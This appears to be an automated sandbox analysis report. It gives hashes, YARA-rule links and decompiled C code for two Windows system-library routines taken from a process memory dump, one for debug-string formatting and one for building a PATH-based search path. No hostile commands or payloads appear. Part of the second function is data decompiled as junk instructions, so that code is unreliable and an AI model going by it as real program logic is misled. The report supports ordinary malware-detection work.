String ID:
API String ID: 885266447-0
Opcode ID: d88d7fc09db4b07f93bdfb49aa20adc47bb4b0e71eb7b04f79fd8c90d4f23773
Instruction ID: e51e5ce445834884c4b4bd1421883b5cc70a9e9039f604595ee530369e9d3b84
Opcode Fuzzy Hash: d88d7fc09db4b07f93bdfb49aa20adc47bb4b0e71eb7b04f79fd8c90d4f23773
Instruction Fuzzy Hash: 42514671A09344CFC720DF29C88092ABBE5FB88654F148E6EE695C7355E770F844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 048DB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E048DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x49af7a8);
				E0492D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0492D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0491D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0491F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0492DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0491B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0491B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0491E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0491A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x048db171
0x048db171
0x048db171
0x048db171
0x048db171
0x048db176
0x048db17b
0x048db180
0x048db186
0x048db18f
0x048db198
0x048db1a4
0x048db1aa
0x04934802
0x04934802
0x04934805
0x0493480c
0x0493480e
0x048db1d1
0x048db1d3
0x048db1de
0x048db1de
0x04934817
0x0493481e
0x04934820
0x04934822
0x04934822
0x04934824
0x04934824
0x0493482a
0x00000000
0x00000000
0x04934835
0x0493483a
0x0493483d
0x0493483f
0x04934842
0x04934842
0x04934842
0x04934846
0x0493484c
0x0493484e
0x04934851
0x04934851
0x04934853
0x04934854
0x04934854
0x04934858
0x0493485a
0x0493485a
0x0493485d
0x0493485f
0x04934861
0x04934861
0x04934866
0x0493486b
0x0493486e
0x04934871
0x04934876
0x04934876
0x04934878
0x0493487b
0x04934884
0x04934884
0x00000000
0x0493487d
0x0493487d
0x04934882
0x04934889
0x04934889
0x0493488f
0x04934891
0x049348e0
0x049348e2
0x049348e4
0x049348e4
0x049348e7
0x049348e7
0x049348ed
0x049348f4
0x049348f6
0x04934951
0x04934951
0x04934953
0x04934953
0x04934956
0x04934956
0x04934958
0x04934959
0x04934959
0x0493495d
0x0493495d
0x0493495f
0x0493495f
0x04934965
0x04934969
0x049349ba
0x049349ba
0x049349c1
0x049349c5
0x049349cc
0x049349d4
0x049349d7
0x049349da
0x049349e4
0x049349e5
0x049349f3
0x04934a02
0x00000000
0x04934a02
0x04934972
0x04934974
0x00000000
0x00000000
0x04934976
0x04934979
0x04934982
0x04934983
0x04934984
0x0493498b
0x0493498d
0x04934991
0x04934993
0x04934999
0x0493499d
0x049349a2
0x049349a2
0x049349a2
0x04934999
0x049349ac
0x00000000
0x049349b3
0x049348f8
0x049348fe
0x00000000
0x00000000
0x00000000
0x049348fe
0x04934895
0x0493489c
0x049348ad
0x049348b2
0x049348b5
0x049348b7
0x049348ba
0x049348bc
0x049348c6
0x049348c6
0x049348cb
0x049348d1
0x049348d4
0x049348d8
0x049348d8
0x00000000
0x049348d8
0x049348be
0x049348c0
0x00000000
0x00000000
0x049348c2
0x00000000
0x00000000
0x00000000
0x049348c4
0x00000000
0x04934882
0x0493487b
0x04934904
0x04934906
0x00000000
0x00000000
0x04934908
0x0493490e
0x00000000
0x00000000
0x04934910
0x04934917
0x04934917
0x00000000
0x04934917
0x048db1ba
0x049347f9
0x049347fc
0x00000000
0x00000000
0x00000000
0x049347fc
0x048db1c0
0x048db1c0
0x048db1c3
0x048db1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 049348AD

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 507c14d7c7104bddbb39c44d6aa8c94d5a07b08144783ec6919cfe8817e2a7db
Instruction ID: a5601fb2bd50ed8391afcc4b97c58a1642d566aa58e2ce92713ac5807ff1027c
Opcode Fuzzy Hash: 507c14d7c7104bddbb39c44d6aa8c94d5a07b08144783ec6919cfe8817e2a7db
Instruction Fuzzy Hash: 0F510071E002698FEF30CF64C840BAEBBB5BF46719F1242BDD859AB295D33069418B80

Uniqueness

Uniqueness Score: -1.00%

Function 04902581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E04902581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				void* _t244;
				void* _t246;
				void* _t249;
				void* _t250;
				void* _t252;
				signed int _t260;
				signed int _t262;
				intOrPtr _t264;
				signed int _t267;
				signed int _t274;
				signed int _t277;
				signed int _t285;
				intOrPtr _t291;
				signed int _t293;
				signed int _t295;
				void* _t297;
				signed int _t298;
				unsigned int _t301;
				signed int _t305;
				signed int _t307;
				signed int _t311;
				intOrPtr _t323;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t339;
				signed int _t340;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				void* _t347;
				void* _t350;

				_t344 = _t346;
				_t347 = _t346 - 0x4c;
				_v8 =  *0x49cd360 ^ _t344;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t339 = 0x49cb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t301 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t291 = 0x48;
				_t321 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t332 = 0;
				_v37 = _t321;
				if(_v48 <= 0) {
					L16:
					_t45 = _t291 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t340 = 0xc0000106;
						goto L32;
					} else {
						_t339 = L048F4620(_t301,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t291);
						_v52 = _t339;
						__eflags = _t339;
						if(_t339 == 0) {
							_t340 = 0xc0000017;
							goto L32;
						} else {
							 *(_t339 + 0x44) =  *(_t339 + 0x44) & 0x00000000;
							_t50 = _t339 + 0x48; // 0x48
							_t334 = _t50;
							_t321 = _v32;
							 *((intOrPtr*)(_t339 + 0x3c)) = _t291;
							_t293 = 0;
							 *((short*)(_t339 + 0x30)) = _v48;
							__eflags = _t321;
							if(_t321 != 0) {
								 *(_t339 + 0x18) = _t334;
								__eflags = _t321 - 0x49c8478;
								 *_t339 = ((0 | _t321 == 0x049c8478) - 0x00000001 & 0xfffffffb) + 7;
								E0491F3E0(_t334,  *((intOrPtr*)(_t321 + 4)),  *_t321 & 0x0000ffff);
								_t321 = _v32;
								_t347 = _t347 + 0xc;
								_t293 = 1;
								__eflags = _a8;
								_t334 = _t334 + (( *_t321 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t285 = E049639F2(_t334);
									_t321 = _v32;
									_t334 = _t285;
								}
							}
							_t305 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t340 = _v68;
								__eflags = 0;
								 *((short*)(_t334 - 2)) = 0;
								goto L32;
							} else {
								_t295 = _t339 + _t293 * 4;
								_v56 = _t295;
								do {
									__eflags = _t321;
									if(_t321 != 0) {
										_t239 =  *(_v60 + _t305 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t295 =  *(_v60 + _t305 * 4);
										 *(_t295 + 0x18) = _t334;
										_t243 =  *(_v60 + _t305 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M04902959))) {
												case 0:
													__ax =  *0x49c8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0491F3E0(__edi,  *0x49c848c, __ax & 0x0000ffff);
														__eax =  *0x49c8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0491F3E0(_t334, _v80, _v64);
													_t280 = _v64;
													goto L26;
												case 2:
													 *0x49c8480 & 0x0000ffff = E0491F3E0(__edi,  *0x49c8484,  *0x49c8480 & 0x0000ffff);
													__eax =  *0x49c8480 & 0x0000ffff;
													__eax = ( *0x49c8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0491F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0491F3E0(_t334, _v76, _v36);
														_t280 = _v36;
													}
													L26:
													_t347 = _t347 + 0xc;
													_t334 = _t334 + (_t280 >> 1) * 2 + 2;
													__eflags = _t334;
													L27:
													_push(0x3b);
													_pop(_t282);
													 *((short*)(_t334 - 2)) = _t282;
													goto L28;
												case 6:
													__ebx =  *0x49c575c;
													__eflags = __ebx - 0x49c575c;
													if(__ebx != 0x49c575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0491F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x49c575c;
														} while (__ebx != 0x49c575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x49c8478 & 0x0000ffff = E0491F3E0(__edi,  *0x49c847c,  *0x49c8478 & 0x0000ffff);
													__eax =  *0x49c8478 & 0x0000ffff;
													__eax = ( *0x49c8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E049639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x49c6e58 & 0x0000ffff = E0491F3E0(__edi,  *0x49c6e5c,  *0x49c6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x49c6e58 & 0x0000ffff;
													__eax = ( *0x49c6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t305 = _v16;
													_t321 = _v32;
													L29:
													_t295 = _t295 + 4;
													__eflags = _t295;
													_v56 = _t295;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t305 = _t305 + 1;
									_v16 = _t305;
									__eflags = _t305 - _v48;
								} while (_t305 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t332 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M04902935))) {
							case 0:
								__ax =  *0x49c8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t321 =  &_v64;
								_v80 = E04902E3E(0,  &_v64);
								_t291 = _t291 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x49c8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x49c8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E048EEEF0(0x49c79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E048EEB70(__ecx, 0x49c79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t340;
												if(_t340 < 0) {
													L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t301 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x49c7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E048EEB70(__ecx, 0x49c79a0);
										__eax = _v52;
										L36:
										_pop(_t333);
										_pop(_t341);
										__eflags = _v8 ^ _t344;
										_pop(_t292);
										return E0491B640(_t218, _t292, _v8 ^ _t344, _t321, _t333, _t341);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t287 = _v56;
								if(_v56 != 0) {
									_t321 =  &_v36;
									_t289 = E04902E3E(_t287,  &_v36);
									_t301 = _v36;
									_v76 = _t289;
								}
								if(_t301 == 0) {
									goto L44;
								} else {
									_t291 = _t291 + 2 + _t301;
								}
								goto L14;
							case 6:
								__eax =  *0x49c5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x49c8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x49c8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x49c6e58 & 0x0000ffff;
								__eax = ( *0x49c6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t332 = _t332 + 1;
								if(_t332 >= _v48) {
									goto L16;
								} else {
									_t321 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t244 = _t243 + 0x66;
					 *((intOrPtr*)(_t244 - 0x6fd81ffc)) =  *((intOrPtr*)(_t244 - 0x6fd81ffc)) - _t321;
					_t246 = _t244 + 0x74;
					 *((intOrPtr*)(_t246 - 0x6fd9fafc)) =  *((intOrPtr*)(_t246 - 0x6fd9fafc)) - _t321;
					_t249 = _t347 + 0x94;
					 *((intOrPtr*)(_t249 - 0x6ba4cafc)) =  *((intOrPtr*)(_t249 - 0x6ba4cafc)) - _t321;
					_t250 = _t249 + 2;
					 *((intOrPtr*)(_t250 - 0x6fd77ffc)) =  *((intOrPtr*)(_t250 - 0x6fd77ffc)) - _t321;
					asm("daa");
					_t252 = _t250 + 0x114;
					 *((intOrPtr*)(_t252 - 0x6fd7b1fc)) =  *((intOrPtr*)(_t252 - 0x6fd7b1fc)) - _t321;
					asm("daa");
					_t297 = 0x25;
					_t350 = _t252 + 0x135;
					 *((intOrPtr*)(_t246 + 0xd3 - 0x6ba3cbfc)) =  *((intOrPtr*)(_t246 + 0xd3 - 0x6ba3cbfc)) - _t321;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x49aff00);
					E0492D08C(_t297, _t334, _t339);
					_v44 =  *[fs:0x18];
					_t335 = 0;
					 *_a24 = 0;
					_t298 = _a12;
					__eflags = _t298;
					if(_t298 == 0) {
						_t260 = 0xc0000100;
					} else {
						_v8 = 0;
						_t342 = 0xc0000100;
						_v52 = 0xc0000100;
						_t262 = 4;
						while(1) {
							_v40 = _t262;
							__eflags = _t262;
							if(_t262 == 0) {
								break;
							}
							_t311 = _t262 * 0xc;
							_v48 = _t311;
							__eflags = _t298 -  *((intOrPtr*)(_t311 + 0x48b1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t277 = E0491E5C0(_a8,  *((intOrPtr*)(_t311 + 0x48b1668)), _t298);
									_t350 = _t350 + 0xc;
									__eflags = _t277;
									if(__eflags == 0) {
										_t342 = E049551BE(_t298,  *((intOrPtr*)(_v48 + 0x48b166c)), _a16, _t335, _t342, __eflags, _a20, _a24);
										_v52 = _t342;
										break;
									} else {
										_t262 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t262 = _t262 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t342;
						__eflags = _t342;
						if(_t342 < 0) {
							__eflags = _t342 - 0xc0000100;
							if(_t342 == 0xc0000100) {
								_t307 = _a4;
								__eflags = _t307;
								if(_t307 != 0) {
									_v36 = _t307;
									__eflags =  *_t307 - _t335;
									if( *_t307 == _t335) {
										_t342 = 0xc0000100;
										goto L76;
									} else {
										_t323 =  *((intOrPtr*)(_v44 + 0x30));
										_t264 =  *((intOrPtr*)(_t323 + 0x10));
										__eflags =  *((intOrPtr*)(_t264 + 0x48)) - _t307;
										if( *((intOrPtr*)(_t264 + 0x48)) == _t307) {
											__eflags =  *(_t323 + 0x1c);
											if( *(_t323 + 0x1c) == 0) {
												L106:
												_t342 = E04902AE4( &_v36, _a8, _t298, _a16, _a20, _a24);
												_v32 = _t342;
												__eflags = _t342 - 0xc0000100;
												if(_t342 != 0xc0000100) {
													goto L69;
												} else {
													_t335 = 1;
													_t307 = _v36;
													goto L75;
												}
											} else {
												_t267 = E048E6600( *(_t323 + 0x1c));
												__eflags = _t267;
												if(_t267 != 0) {
													goto L106;
												} else {
													_t307 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t342 = E04902C50(_t307, _a8, _t298, _a16, _a20, _a24, _t335);
											L76:
											_v32 = _t342;
											goto L69;
										}
									}
									goto L108;
								} else {
									E048EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t342 = _a24;
									_t274 = E04902AE4( &_v36, _a8, _t298, _a16, _a20, _t342);
									_v32 = _t274;
									__eflags = _t274 - 0xc0000100;
									if(_t274 == 0xc0000100) {
										_v32 = E04902C50(_v36, _a8, _t298, _a16, _a20, _t342, 1);
									}
									_v8 = _t335;
									E04902ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t260 = _t342;
					}
					L70:
					return E0492D0D1(_t260);
				}
				L108:
			}

0x04902584
0x04902586
0x04902590
0x04902596
0x04902597
0x04902598
0x04902599
0x0490259e
0x049025a4
0x049025a9
0x049025ac
0x049025ae
0x049025b1
0x049025b2
0x049025b5
0x049025b8
0x049025bb
0x049025bc
0x049025bf
0x049025c2
0x049025c5
0x049025c6
0x049025cb
0x049025ce
0x049025d8
0x049025dd
0x049025de
0x049025e1
0x049025e3
0x049025e9
0x049026da
0x049026da
0x049026dd
0x049026e2
0x04945b56
0x00000000
0x049026e8
0x049026f9
0x049026fb
0x049026fe
0x04902700
0x04945b60
0x00000000
0x04902706
0x04902706
0x0490270a
0x0490270a
0x0490270d
0x04902713
0x04902716
0x04902718
0x0490271c
0x0490271e
0x04945b6c
0x04945b6f
0x04945b7f
0x04945b89
0x04945b8e
0x04945b93
0x04945b96
0x04945b9c
0x04945ba0
0x04945ba3
0x04945bab
0x04945bb0
0x04945bb3
0x04945bb3
0x04945ba3
0x04902724
0x04902726
0x04902729
0x0490272c
0x0490279d
0x0490279d
0x049027a0
0x049027a2
0x00000000
0x0490272e
0x0490272e
0x04902731
0x04902734
0x04902734
0x04902736
0x04945bc1
0x04945bc1
0x04945bc4
0x00000000
0x04945bca
0x04945bca
0x04945bcd
0x00000000
0x04945bd3
0x00000000
0x04945bd3
0x04945bcd
0x0490273c
0x0490273c
0x04902742
0x04902747
0x0490274a
0x0490274d
0x04902750
0x00000000
0x04902756
0x04902756
0x00000000
0x04902902
0x04902908
0x0490290b
0x00000000
0x04902911
0x0490291c
0x04902921
0x00000000
0x04902921
0x00000000
0x00000000
0x04902880
0x04902887
0x0490288c
0x00000000
0x00000000
0x04902805
0x0490280a
0x04902814
0x04902816
0x00000000
0x00000000
0x0490281e
0x04902821
0x04902823
0x00000000
0x04902829
0x04902829
0x04902831
0x0490283c
0x0490283e
0x00000000
0x0490283e
0x00000000
0x00000000
0x0490284e
0x04902850
0x04902851
0x04902854
0x04902857
0x0490285a
0x0490285c
0x0490285d
0x00000000
0x00000000
0x0490275d
0x04902761
0x00000000
0x04902767
0x0490276e
0x04902773
0x04902773
0x04902776
0x04902778
0x0490277e
0x0490277e
0x04902781
0x04902781
0x04902783
0x04902784
0x00000000
0x00000000
0x04945bd8
0x04945bde
0x04945be4
0x04945be6
0x04945be8
0x04945be9
0x04945bee
0x04945bf8
0x04945bff
0x04945c01
0x04945c04
0x04945c07
0x04945c0b
0x04945c0d
0x04945c0d
0x04945c15
0x04945c18
0x04945c1b
0x04945c1b
0x04945c1e
0x00000000
0x00000000
0x049028c3
0x049028c8
0x049028d2
0x049028d4
0x049028d8
0x049028db
0x04945c26
0x04945c28
0x04945c2d
0x04945c2d
0x00000000
0x00000000
0x04945c34
0x04945c36
0x04945c49
0x04945c4e
0x04945c54
0x04945c5b
0x04945c5d
0x04945c60
0x04902788
0x04902788
0x0490278b
0x0490278e
0x0490278e
0x0490278e
0x04902791
0x00000000
0x00000000
0x04902756
0x04902750
0x00000000
0x04902794
0x04902794
0x04902795
0x04902798
0x04902798
0x00000000
0x04902734
0x0490272c
0x04902700
0x049025ef
0x049025ef
0x049025ef
0x049025f2
0x049025f8
0x00000000
0x00000000
0x049025fe
0x00000000
0x049028e6
0x049028ec
0x049028ef
